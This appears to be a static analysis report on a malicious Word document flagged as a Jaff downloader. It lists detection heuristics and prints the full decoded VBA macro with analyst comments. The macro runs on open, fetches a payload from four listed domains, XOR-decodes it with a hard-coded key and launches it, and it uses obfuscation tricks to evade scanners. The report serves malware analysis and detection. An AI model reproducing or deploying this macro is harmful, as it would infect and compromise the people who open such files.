Malicious Office (OLE) / .DOC — malware analysis report

Static analysis result for SHA-256 d737dd850abc18ca…

MALICIOUS

Office (OLE) / .DOC

102.5 KB Created: 2017-05-25 09:59:00 Authoring application: Microsoft Office Word First seen: 2026-06-20
MD5: d79192bbbf1c8b6ac862d6e72dc6931c SHA-1: e0812c93bf50764356319eed91ec9498717d69b6 SHA-256: d737dd850abc18ca6ca1c072c62c3b9f67e94f65da903e76f889d76d7a9ea1dd
318 Risk Score

Heuristics 11

  • ClamAV: Doc.Downloader.Jaff-6329915-0 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Doc.Downloader.Jaff-6329915-0
  • Reference to Windows Script Host high SC_STR_WSCRIPT
    Reference to Windows Script Host
  • VBA macros detected medium 6 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • CreateObject call high OLE_VBA_CREATEOBJ
    CreateObject call
    Matched line in script
    Set AbsoluteHidMachine = CreateObject(privateProbeName)
  • GetObject call high OLE_VBA_GETOBJ
    GetObject call
    Matched line in script
    Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")
  • CallByName call high OLE_VBA_CALLBYNAME
    CallByName call
    Matched line in script
    CallByName SubProperty, "saveTo" + _
  • VBA p-code auto-exec with execution tokens high OLE_VBA_PCODE_AUTOEXEC_EXEC
    Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoopen()
  • Document_Open macro low OLE_VBA_DOCOPEN
    Document_Open macro
    Matched line in script
    Sub Document_Open()
  • Legacy WordBasic auto-exec macro marker medium OLE_LEGACY_WORDBASIC_AUTOEXEC
    OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself. On this sample that premise does not hold — a VBA project was recovered (see OLE_VBA_MACROS and the extracted macros.bas artifact below), so read this marker alongside the VBA findings rather than as independent evidence.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://schemas.openxmlformats.org/drawingml/2006/main In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/bibliography — In document text (OLE body)
    • http://schemas.openxmlformats.org/officeDocument/2006/customXml — In document text (OLE body)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename | Kind | Source | Size
macros.bas vba-macro oletools.olevba.extract_macros (decoded VBA source) 11789 bytes
SHA-256: 90cf754c2b62b58870dd376181a2d519a8b56aa6a1cb4b1355c8612804061ca0
Preview script
First 1,000 lines of the extracted script
' Header emitted by the olevba export for the document's own code module
' ("ThisDocument"). The two auto-exec entry points (autoopen, Document_Open) live here.
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

' Entry point: Word runs this automatically when the document is opened
' (OLE_VBA_AUTOOPEN). It clears the SignIn_Fish flag (checked later in STRIX.Ant;
' nothing in this listing sets it again) and hands control to Module1.Synomati.
' The string argument is effectively unused: Synomati jumps past the only line
' that reads it.
Sub autoopen()
SignIn_Fish = 0
Synomati "a4833"
End Sub



' Second auto-exec handler (OLE_VBA_DOCOPEN). The body is empty, so it does nothing;
' all real work starts from autoopen.
Sub Document_Open()

End Sub







' Header for the "LocalBrowser" module. No code was recovered for it; the two-GUID
' VB_Base is consistent with a UserForm. The rest of the macro reads method names,
' URL parts and delimiters from its controls (Label1/Label2/ZK/Command captions,
' T2.Text, OptionButton1/OptionButton2/SpinButton1 tags, ToggleButton1 caption).
' Those control values are not in this listing — recover them from the form's
' storage to complete the analysis; presumably they hold the HTTP method names and
' the User-Agent string (confirm).
Attribute VB_Name = "LocalBrowser"
Attribute VB_Base = "0{57B045ED-7B73-4D3A-90CB-4EF44BB09A4B}{4E1B5C00-BDB1-4F57-BC61-AF6FACCB55C8}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False

' Header for the "STRIX" class module. It is instantiated with New STRIX from
' Module1/Module4 and its methods are mostly invoked through CallByName, which keeps
' the method names out of simple string scans.
Attribute VB_Name = "STRIX"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
' First stage of the string-decoding chain. The ProgIDs and other strings the
' downloader needs are stored in the document's "Content status" built-in property,
' joined with the literal "Abcdef"; the split result is kept in the module-level
' MotoGP() array (so the property, not the macro source, is where the object names
' must be recovered from). Quubo is a Public Const 0, so privateProbeName = MotoGP(0):
' the ProgID that privateProbe passes to CreateObject (OLE_VBA_CREATEOBJ).
' Presumably reached from Synomati via CallByName with LocalBrowser.T2.Text as the
' method name (that text is not in this listing — confirm).
' The "" return value is never used by any caller.
Public Function setAsMainTarget() As String

tt = ThisDocument.BuiltInDocumentProperties("Content status").Value
MotoGP = Split(tt, "Abcdef")
privateProbeName = MotoGP(Quubo * 3)
privateProbe

setAsMainTarget = ""

End Function


    ' Called from Module1.SaveDataCSVToolStripMenuItem_Click with ("Swed", 13); both
    ' parameters are ignored. It only issues the two PlayCry steps that prepare the
    ' request object (see PlayCry: 1 opens the request, 350 sets the User-Agent header).
    Public Sub Challenge(sender As String, e As Integer)
PlayCry 1
PlayCry 350
    End Sub

    
    
    
' Writes the HTTP response bytes (SignIn_PokerFace, filled in Module2.High6) into the
' SubProperty stream object, saves that stream to disk, then hands off to the
' decode-and-open step (Module4.High4).
' Everything between "GoTo cip" and the "cip:" label (ROM/PCM-sounding code that
' references names not defined anywhere here) is never executed — filler to dilute
' the macro.
Public Sub Ant()


  SubProperty.Write SignIn_PokerFace
GoTo cip


 If Not CryToLoad.Compressed Then
 For g = 0 To CryToLoad.Size - 1
 CryToLoad.Data(g) = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, (cryOffset) + 16 + g, 1)))
 Next
 Else
 If alignment = 0 Then
 pcmLevel = ByteTo.SignedInt("&H" & (Rea.dHEX(LoadedROM, offtrack, 1)))
 offtrack = offtrack + 1
 Data.Add (pcmLevel)
 alignment = &H20
 End If
 offtrack = offtrack + 1
 If alignment < &H20 Then
 Data.Add (pcmLevel)
 End If
 Data.Add (pcmLevel)
 If Size >= CryToLoad.Size Then
 End If
 alignment = 1
 CryToLoad.Data = Data.ToArray()
 CryToLoad.Size = offtrack - Start
 End If
cip:

' Method name assembled at run time: "saveTo" + a form label (presumably "saveToFile"
' — confirm from the form). Arguments are the drop path built in SignIn_ProjectSpeed
' (SignIn_PathTo2) and 2; for an ADODB.Stream that second argument would mean
' "create or overwrite". This is the OLE_VBA_CALLBYNAME match.
CallByName SubProperty, "saveTo" + _
LocalBrowser.Label2.Caption, VbMethod, SignIn_PathTo2, 2
' SignIn_Fish is set to 0 in autoopen and never changed in this listing, so this
' early exit is not taken.
If SignIn_Fish <> 0 Then

 Exit Sub
End If
' Decode the saved file and open the result (parameters are ignored by High4).
High4 "4", 3
End Sub


' Header for standard module "Module3": holds the file read / XOR / write helper
' WidthA plus two never-called filler routines (SaveCry, enumMembers).
Attribute VB_Name = "Module3"


 ' Filler: not called from anywhere in this listing, and it references names
 ' (LoadedROM, Searc.hFreeSpaceFourAligned, DialogResult, GetI.NIFileLocation) that
 ' are not defined here, so it would fail at run time if it were reached. Ignore
 ' for behaviour; its text is still useful for similarity matching across samples.
 Public Function SaveCry(crytosave, cryTable) As Boolean
 If crytosave.Offset = 0 Then
 End If
 crytosave.Compressed = False
 If crytosave.Compressed Then
 MsgBox ("This should not be enabled!")
 End
 Else
 For Each s In crytosave.Data
 Data.Add (CByte(s And &HFF))
 Next
 End If
 If crytosave.Size < Data.Count Then
 If (result = DialogResult.Yes) Then
 If (result2 = DialogResult.Yes) Then
 End If
 crytosave.Offset = Searc.hFreeSpaceFourAligned(LoadedROM, &HFF, Data.Count, "&H" & GetS.tring(GetI.NIFileLocation(), header, "StartSearchingForSpaceOffset", "800000"))
 Else
 End If
 End If
 End Function




' Reads the whole file Dbbb into a byte array, XOR-decodes it in place with the key
' SignIn_Sexote (Module4.Subfunc), and writes the result to bbbJ. Called once, from
' Module4.High4, with the raw download as source, the final file path as destination
' and a 32-character key literal. The source file is not removed afterwards.
' Note: the buffer is sized from LOF, so a 0-byte download would make the ReDim
' (0 To -1) raise an error before any decoding happens.
Public Sub WidthA(Dbbb As String, bbbJ As String, Optional SignIn_Sexote As String)
 Dim bbb As Integer
bbb = FreeFile
 Dim Gbbb() As Byte
 Open Dbbb For Binary As #bbb
 ReDim Gbbb(0 To LOF(bbb) - 1)
 Get #bbb, , Gbbb()
 Close #bbb
 ' In-place repeating-key XOR of the file bytes.
 Call Subfunc(Gbbb(), SignIn_Sexote)
 bbb = FreeFile
 Open bbbJ For Binary As #bbb
 Put #bbb, , Gbbb()
 Close #bbb
End Sub


' Filler: never called. It resembles a fragment of a directory user-export script
' (objMember.Class = "user") but only assigns placeholder "-" values and builds an
' empty SecondEmail string; On Error Resume Next masks the undefined references.
' Not a reconnaissance capability in this sample — it has no caller and emits nothing.
Sub enumMembers(objDomain)
    On Error Resume Next
    Dim Secondary(20)
    For Each objMember In objDomain
        If objMember.Class = "user" Then
            x = x + 1

            
            

            
            Counter = 0
            For ll = 1 To 20
                If Secondary(ll) <> "" Then
                    If Counter = 0 Then
                        SecondEmail = Secondary(ll)
                    Else
                        SecondEmail = SecondEmail + ", " + Secondary(ll)
                    End If
                    Counter = Counter + 1
                End If
            Next
            SecondEmail = """" & SecondEmail & """"
            
            
            
            SamAccountName = "-"
            Cn = "-"
            FirstName = "-"
            LastName = "-"
            initials = "-"
            Descrip = "-"
            Off.ice = "-"
            Telephone = "-"
            EmailAddr = "-"
            WebPage = "-"
            Addr1 = "-"
            City = "-"
            State = "-"
            ZipCode = "-"
            Title = "-"
            Department = "-"
            Company = "-"
            Manager = "-"
            Profile = "-"
            LoginScript = "-"
            HomeDirectory = "-"
            HomeDrive = "-"
            AdsPath = "-"
            
            For ll = 1 To 20
                Secondary(ll) = ""
            Next
            Primary = "-"
            SecondEmail = ""
        End If

        
    Next
End Sub

' Header for standard module "Module1": the downloader's main logic and its shared
' state. Variable names are random-looking; the roles below come from how each one
' is used in this listing.
Attribute VB_Name = "Module1"

' Download-server list, filled in privateProbe from the URL string there.
Public cnpk() As String
' Full request URL for the current attempt (form caption prefix + a cnpk entry).
Public SignIn_4 As String
  
' Header name passed to the request object's header-setting call (PlayCry 350).
Public Const SignIn_System = "User-Agent"
' Stream object (CreateObject(MotoGP(1))) that receives the response body and saves it.
Public SubProperty As Object


' Environment collection returned by SignIn_avatar.Environment(MotoGP(4)).
Public SignIn_RDD2 As Object

' Flag cleared in autoopen; STRIX.Ant would exit early if it were non-zero.
Public SignIn_Fish As Integer


' Decoded string table: "Content status" document property split on "Abcdef".
Public MotoGP() As String

' Counter: first a MotoGP index (6), then a suffix in the drop-file names (8).
Public itemI As Integer
' Final (decoded) file path.
Public SignIn_Project As String
' ProgID MotoGP(0) passed to CreateObject in privateProbe.
Public privateProbeName As String
' Path of the raw download (<dir>\fremsoho<itemI>).
Public SignIn_PathTo2 As String
' HTTP request object (CreateObject(MotoGP(0))); exposes .Status and "responseBody".
Public AbsoluteHidMachine As Object


' Response body read from AbsoluteHidMachine in High6.
Public SignIn_PokerFace As Variant
' Object from CreateObject(MotoGP(2)); only used to .Open the decoded file in High4.
Public SignIn_aifde As Object
' Value of one environment variable (MotoGP(6)); used as the drop directory.
Public SignIn_LAKOPPC As String
' Object from CreateObject(MotoGP(3)) that exposes .Environment (consistent with
' WScript.Shell — confirm from "Content status").
Public SignIn_avatar As Object
  
' Label1 caption copied in privateProbe; not read again in this listing.
Public smbi As String
' Never referenced in this listing.
Public SignIn_2 As String
' Constant 0 used to obscure the MotoGP(0) index in setAsMainTarget.
Public Const Quubo = 0


' Performs one HTTP request. Called from RepackOK with e = 72, so the "< 488" branch
' always runs. The name is borrowed from unrelated GUI code.
' Note on cnpk(i): i is not declared in this Sub and RepackOK's i is local to
' RepackOK, so this appears to read cnpk(Empty) = cnpk(0) — only the first server in
' the list would ever be requested (hedged: depends on no Option Explicit, which the
' listing does not show).
Public Sub SaveDataCSVToolStripMenuItem_Click(e As Integer)
       SignIn_4 = LocalBrowser.ZK.Caption & cnpk(i)
 ' 6 -> 8; the value later becomes the "fremsoho<n>" suffix in SignIn_ProjectSpeed.
 itemI = itemI + 2
 Dim XIpotom2 As STRIX
Set XIpotom2 = New STRIX
If e < 488 Then


 ' Open the request and set the User-Agent header (STRIX.Challenge -> PlayCry).
 XIpotom2.Challenge "Swed", 13
' Method name from the form; RepackOK reads .Status right after, so this is
' presumably the send call (confirm from the form data).
CallByName AbsoluteHidMachine, LocalBrowser.ToggleButton1.Caption, VbMethod
Set XIpotom2 = Nothing
 
Else

End If
    End Sub



 ' Filler: never called; Us.ing, Encoding, CUS.hort and SeekOrigin are not VBA names,
 ' so it would fail at run time if reached. ("Return" here is VBA's GoSub return,
 ' not a function return.) Same WAV-writer text is repeated inside PlayCry.
 Public Sub ExportCry(filename, cry)
 If cry.Offset = 0 Then
 Return
 End If
 Us.ing writer
 writer.Write (Encoding.ASCII.GetBytes("RIFF"))
 writer.Write (0)
 writer.Write (Encoding.ASCII.GetBytes("WAVE"))
 writer.Write (Encoding.ASCII.GetBytes("fmt "))
 writer.Write (16)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(1))
 writer.Write (cry.SampleRate)
 writer.Write (cry.SampleRate)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(8))
 writer.Write (Encoding.ASCII.GetBytes("data"))
 writer.Write (cry.Data.Length)
 For Each sample In cry.Data
 writer.Write (CByte(sample + &H80))
 Next
 writer.Seek 4, SeekOrigin.Begin
 writer.Write (CInt(writer.BaseStream.Length) - 8)
 End Sub





' Second step from autoopen. The GoTo jumps straight to l12, so the Windows 7 / XP
' version check (strCaption is never assigned) is dead filler and Comps is unused;
' the function has no return value in the live path.
' At l12 it creates a STRIX object and calls a method whose name is read from the
' LocalBrowser form (T2.Text) — presumably STRIX.setAsMainTarget, the only STRIX
' member not called by name elsewhere in this listing (confirm from the form data).
Public Function Synomati(Comps)
 GoTo l12
 strComputer = Comps
 If InStr(1, strCaption, "Windows 7", vbTextCompare) Then
 Synomati = "Win7"
 End If
 If InStr(1, strCaption, "XP", vbTextCompare) Then
 Synomati = "XP"
 End If
l12:
 Dim c As STRIX
Set c = New STRIX
CallByName c, LocalBrowser.T2.Text, _
VbMethod
End Function

' Creates the COM objects and the server list, then starts the download loop.
' All ProgIDs come from the MotoGP() table (document property "Content status"),
' so none of them appear in the macro text; the roles below are inferred from use:
'  - AbsoluteHidMachine = MotoGP(0): later used with .Status, "responseBody" and
'    open/send-style CallByName calls — consistent with an XMLHTTP-type object (confirm).
'  - SignIn_avatar = MotoGP(3): exposes .Environment(...) — consistent with
'    WScript.Shell (the SC_STR_WSCRIPT hit); SignIn_LAKOPPC becomes the value of one
'    environment variable (name MotoGP(6)), later used as the drop directory
'    (presumably a writable location such as %TEMP% — confirm).
'  - SubProperty = MotoGP(1): stream with .Write / .Type / "Open" / "saveTo…".
'  - SignIn_aifde = MotoGP(2): only used to .Open the decoded file in High4.
' Server list: "RRDD" -> "om" repairs the .com domain, then the string is split on
' LocalBrowser.Command.Caption (presumably "V", which yields four host/path entries:
' vsflot.ru/TrfHn4, better57toiuydof.net/af/TrfHn4, youtoolgrabeertorse.org/af/TrfHn4,
' operadorapuma.com/TrfHn4 — confirm the delimiter). These are the network IoCs for
' this sample. The "\" -> "/" Replace is a no-op on this literal.
Public Sub privateProbe()
Set AbsoluteHidMachine = CreateObject(privateProbeName)

smbi = LocalBrowser.Label1.Caption
MotoGPE = MotoGP(2)


Set SignIn_avatar = CreateObject(MotoGP(3))
   Shtefin = Replace("vsflot.ru/TrfHn4Vbetter57toiuydof.net/af/TrfHn4Vyoutoolgrabeertorse.org/af/TrfHn4Voperadorapuma.cRRDD/TrfHn4", "RRDD", "om")
   Shtefin = Replace(Shtefin, "\", "/")
cnpk = Split(Shtefin, LocalBrowser.Command.Caption)
 Set SubProperty = CreateObject(MotoGP(1))
    Set SignIn_aifde = CreateObject(MotoGPE)

Set SignIn_RDD2 = SignIn_avatar.Environment(MotoGP(4))


 ' itemI = 6 here; it is bumped to 8 per request in SaveDataCSVToolStripMenuItem_Click.
 itemI = 18 / 3
 SignIn_LAKOPPC = SignIn_RDD2(MotoGP(itemI))



     ' Start the request loop (arguments are ignored by RepackOK).
     RepackOK "4", "3", "5"

End Sub


 ' Configures the request object AbsoluteHidMachine through CallByName; the method
 ' names come from LocalBrowser control tags and are not in this listing.
 '  cry = 1 (from Challenge): method(MotoGP(5), SignIn_4, False) — the shape of an
 '    XMLHTTP Open(verb, url, async=False); MotoGP(5) would be the HTTP verb (confirm).
 '  any other value (350 from Challenge): jumps to lab1 and calls
 '    method(SignIn_System = "User-Agent", SpinButton1.Tag) — the shape of
 '    setRequestHeader. The User-Agent value lives on the form and is a useful
 '    network-detection artifact once recovered.
 ' The lines between the If block and lab1, and after the second Exit Sub, are
 ' unreachable filler copied from some WAV-writing code (same text as ExportCry).
 Public Sub PlayCry(cry As Integer)
 If cry = 1 Then
CallByName AbsoluteHidMachine, LocalBrowser.OptionButton1.Tag, VbMethod, MotoGP(5), SignIn_4, False
Exit Sub
Else: GoTo lab1
End If
 If c.ry.Offset = 0 Then
 Exit Sub
 End If
 writer.Write (Encoding.ASCII.GetBytes("RIFF"))
 writer.Write (0)
 writer.Write (Encoding.ASCII.GetBytes("WAVE"))
 writer.Write (Encoding.ASCII.GetBytes("fmt "))
 writer.Write (16)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(1))
 writer.Write (cr.y.SampleRate)
 writer.Write (cr.y.SampleRate)
 writer.Write (CUS.hort(1))
 writer.Write (CUS.hort(8))
 writer.Write (Encoding.ASCII.GetBytes("data"))
 writer.Write (cr.y.Data.Length)
 For Each sample In cr.y.Data
 writer.Write (CByte(sample + &H80))
 Next
 writer.Seek 4, SeekOrigin.Begin
 writer.Write (CInt(writer.BaseStream.Length) - 8)
lab1:
CallByName AbsoluteHidMachine, LocalBrowser.OptionButton2.Tag, VbMethod, SignIn_System, _
LocalBrowser.SpinButton1.Tag
Exit Sub
 stream.Seek 0, SeekOrigin.Begin
 player.Load
 player.Play
 End Sub

' Download loop; the three parameters are unused. For each cnpk index it fires one
' request (SaveDataCSVToolStripMenuItem_Click), raises an error if the HTTP status
' is not 200, and otherwise runs High6 (save + decode + open) and exits.
' The "On Error GoTo dee13" is commented out, so a non-200 response raises an
' unhandled error (700 + vbObjectError) that ends the macro — there is no working
' failover to the next server. The loop index i is also not visible to the callee
' (see the note in SaveDataCSVToolStripMenuItem_Click), so it appears only cnpk(0)
' would ever be requested. In practice the loop body runs at most once.
Public Sub RepackOK(sheetToMove As String, sheetAnchor As String, High6OrAfter As String)


 Dim i
 'On Error GoTo dee13
For i = LBound(cnpk) To UBound(cnpk) Step 1
 SaveDataCSVToolStripMenuItem_Click 72
If AbsoluteHidMachine.Status <> 200 Then
 Err.Raise 700 + vbObjectError, "V", "W"
End If
    
    
    
    ' Success path: save the response, decode it and open the result, then stop.
    High6 "3", 33
 Exit Sub
dee13:
Next
Exit Sub

    
End Sub






' Bitwise XOR written as (a Or b) And Not (a And b) so the Xor keyword does not
' appear in the source. per and der are unused. Applied per byte by Module4.Subfunc.
Public Function OrAndNotAnd(a, b)
Dim per
Dim der
   OrAndNotAnd = (a Or b) And (Not (a And b))
End Function


' Builds the two file paths. The first GoTo skips everything up to labelBabel2, so
' the Scripting.FileSystemObject, WScript.Arguments, InputBox and the
' GetObject("winmgmts:...") WMI call are dead code: those are the lines the
' SC_STR_WSCRIPT and OLE_VBA_GETOBJ heuristics matched, but they never execute here.
' Live part:
'   SignIn_Project = SignIn_LAKOPPC (directory taken from the environment)
'   SignIn_PathTo2 = <dir> + "\fremsoho" + itemI  (itemI is 8 on the first request,
'                    so "...\fremsoho8") — where the raw download is saved
'   SignIn_Project = <dir> + MotoGP(12) with itemI inserted before the "." (a
'                    "name8.ext" shape; presumably the executable name — confirm
'                    from "Content status")
'   SubProperty.Type = 1 — stream set to binary before it is opened in High6.
' The second GoTo targets the very next label and is a no-op.
Public Function SignIn_ProjectSpeed()

GoTo labelBabel2
    Set FSO = CreateObject("Scripting.FileSystemObject")

Set oArgs = WScript.Arguments
If oArgs.Count = 1 Then
        strComputer = CStr(oArgs(0))
Else
    strComputer = InputBox("Enter computer name")
End If

Set objWMIService = GetObject("winmgmts:\\" & strComputer & "\root\CIMV2")

labelBabel2:
 SignIn_Project = SignIn_LAKOPPC
 SignIn_PathTo2 = SignIn_Project + "\fremsoho" + CStr(itemI)


GoTo labelBabel3
    
labelBabel3:
SignIn_Project = SignIn_Project + Replace(MotoGP(12), ".", CStr(itemI) + ".")
 SubProperty.Type = 1
End Function


' Header for standard module "Module2": the post-download step High6 plus one
' never-called filler routine (GetCryImage).
Attribute VB_Name = "Module2"

' Post-download step from RepackOK (called with "3", 33; both parameters unused).
' Computes the paths, opens the stream (method name split into "O" + "pen" to defeat
' string matching), copies the response body out of the request object into
' SignIn_PokerFace, then LoadCry -> STRIX.Ant writes/saves/decodes/opens it.
' The NumHoja > 400 branch (numExportadas is never set) is filler and is not taken
' with the value 33; the function's String return is never assigned on the live path.
Public Function High6(FullPath As String, NumHoja As Integer) As String
SignIn_ProjectSpeed
 CallByName SubProperty, "O" + "pen", VbMethod
If NumHoja > 400 Then
 If numExportadas = 0 Then
 High6 = "No rows to export [No tiene filas por exportar]"
 Exit Function
 End If
End If
 ' Read the downloaded bytes (property access via CallByName / VbGet).
 SignIn_PokerFace = CallByName(AbsoluteHidMachine, "responseBody", VbGet)
LoadCry 0, 1
End Function
 ' Filler: never called; GetS.tring, AppPath, Bit.map, g and Pens are not defined
 ' here, so it would fail at run time if reached. The result cryImage is never
 ' returned.
 Public Function GetCryImage(cry)
 Dim cryImage
 If GetS.tring(AppPath & "GBAPGESettings.ini", "Settings", "DisableCryImage", "0") = "1" Then
 cryImage = Bit.map(128, 128)
 Else
 cryImage = Bit.map(cry.Data.Length, 128)
 For i = 1 To cry.Data.Length - 1
 g.DrawLine Pens.Green, i - 1, 64 + cry.Data(i - 1), i, 64 + cry.Data(i)
 Next
 End If
 End Function










' Header for standard module "Module4": the XOR decoder (Subfunc), the final
' decode-and-open step (High4) and the LoadCry indirection.
Attribute VB_Name = "Module4"

' Repeating-key XOR, in place: MethodParam2(k) = MethodParam2(k) XOR key(k Mod Len(key)),
' where key is the ANSI byte form of MethodParam (StrConv vbFromUnicode) and the XOR
' is done through OrAndNotAnd. Called from WidthA with the 32-character key literal
' given in High4. The ReDim is immediately overwritten by the StrConv assignment.
' oldj3/oldj5/oldj6 compute a percentage-progress value that is never used — a
' leftover from the donor code. An empty key would fault on "Mod 0".
Public Sub Subfunc(MethodParam2() As Byte, MethodParam As String)

  
  Dim oldj2 As Long
  Dim oldj3 As Long
  Dim oldj5 As Long
  Dim oldj6 As Long
  Dim plusplus() As Byte
Dim oldj4 As Long
Dim plusplusLen As Long
  plusplusLen = Len(MethodParam)
ReDim plusplus(plusplusLen)

  plusplus = StrConv(MethodParam, vbFromUnicode)

  
  oldj2 = UBound(MethodParam2) + 1
  oldj5 = oldj2
  
  
  For oldj4 = _
  0 To (oldj2 - 1)
    aa = plusplus(oldj4 Mod plusplusLen)
    bb = MethodParam2(oldj4)
    MethodParam2(oldj4) = OrAndNotAnd(bb, aa)
    
    If (oldj4 >= oldj6) Then
      oldj3 = Int((oldj4 / oldj5) * 100)
      oldj6 = (oldj5 * ((oldj3 + 1) / 100)) + 1
    End If
  Next
End Sub


' Final stage, called from STRIX.Ant ("4", 3; parameters unused): decode the saved
' download SignIn_PathTo2 into SignIn_Project with the hard-coded XOR key, then open
' the decoded file through SignIn_aifde (CreateObject(MotoGP(2)) — presumably a
' shell-style object whose Open launches the file; confirm from "Content status").
' Host-side artifacts from this step: the XOR key "6WLms4bGcHU5iDixvWv6Wmuql3ILxV8S",
' the "\fremsoho<n>" raw-download file and the decoded file written in the same
' directory; the encoded copy is not deleted.
Public Function High4(FullPath As String, NumHoja As Integer) As String
  WidthA SignIn_PathTo2, SignIn_Project, "6WLms4bGcHU5iDixvWv6Wmuql3ILxV8S"


SignIn_aifde.Open (SignIn_Project)
   
End Function


' Indirection only: parameters unused. Creates a STRIX object and calls its Ant
' method by name — one more CallByName hop between High6 and the file write.
Public Function LoadCry(index As Integer, cryTable As Integer)


Dim c As STRIX
Set c = New STRIX
CallByName c, "Ant", _
VbMethod

 End Function